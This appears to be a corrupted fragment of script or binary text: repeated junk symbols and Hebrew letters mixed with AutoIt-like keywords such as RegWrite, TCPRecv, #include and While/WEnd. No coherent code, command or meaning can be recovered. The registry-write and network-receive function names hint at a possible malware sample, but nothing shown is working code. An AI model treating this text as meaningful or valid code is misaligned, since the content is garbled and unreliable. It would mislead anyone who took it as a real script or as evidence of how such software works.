’§it$@Hot?8:0?8:0?8:1?8:1?8:3ElseIf:3?8:0?8:$R$b+''?8:0?8::8?8:7?8:$4
$Enn:8:1?0:0?8:1?:1?1:88?:7?8:ךךךךךךךךךךךךךךך''WEndבבבבבבבבבבבבבRegWritבבבבבבבבבבבבבIsKeywordבבבבבבבבבבבבבבבבIsKvywordבבבבבבבבבבבבבב:3?8?:?:1838:1?8A:1?8:7?8/:0?8:$R$b'+'d
$ 
While„$n2
When n$1$2$R$b+''WEnd:1?8:$4
$Enn?8:7?8:ךךךךךךךךךךTCPRecvךךךךךךךךךךך×ךךךך8:0?8:7?8:1?8:0?W+8:''בבבבב:3?8?:?:1838:1?8A:1?8:7?8/:0?8:$R$b+''d
$ 
While„$n2
When n$1$2$R$b+''WEnd:?781?x:7?7:0?8:0?8:8?8:7?8:$4
$Enn?8:7?8:ךךךךךךךךךךTCPRecvךךךךך#includeךךךךךך×ךךךך8:0?8:7?8:1?8:0?W+8:'':7?8:$4
$Enn$b+''W807:??8:7?8:1?0:0?8:1?:1?1:88?:7?8:ךךךךךךךךךךךךךךך''WEndבבבבבבבבבבבבבבב:1=8:7?8:1?1:8?8:7?8:$4
$E:7?8:$4
$Enn:8:1?0:0?8:1?:1?1:88?:7?8:ךךךךךךךךךךךךךךך''WEndבבבבבבבבבבבבבRegWritבבבבבבבבבבבבבIsKeywosKvywordבבבבבבבבבבבבבב:3?8?:?:1838:1?8A:1?8:7?8/:0?8:$R$b'+'d
$ 
While„$n2
When n$1$2$R$b+''WEnd:1?8:0?8:1?8:0?8:7?x:7?7:0?8:0?8:8?8:7?8:$4
$Enn?8:7?8:ךךךךךךךךךךTCPRecvךךךךךךךךךךך×ךךךך8:0?8:7?8:1?8:0?W+8:''בבבבב:3?nn$b+''W0?8:7?